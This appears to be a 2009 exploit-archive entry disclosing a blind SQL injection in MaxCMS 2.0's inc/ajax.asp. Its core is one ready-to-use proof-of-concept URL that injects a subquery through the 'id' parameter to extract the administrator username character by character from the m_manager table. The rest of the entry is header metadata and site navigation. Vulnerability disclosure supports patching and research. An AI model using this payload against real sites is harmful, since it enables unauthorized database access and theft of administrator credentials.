[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MaxCMS 2.0 (inc/ajax.asp) Remote SQL Injection Vulnerability
# Published : 2009-05-18
# Author : Securitylab.ir
# Previous Title : Jieqi CMS <= 1.5 Remote Code Execution Exploit
# Next Title : DGNews 3.0 Beta (id) Remote SQL Injection Vulnerability


######################### Securitylab.ir ########################
# Application Info:
# Name: Maxcms
# Version: 2.0
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
# http://site.com/inc/ajax.asp?action=digg&amp;id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# www.Syue.com [2009-05-18]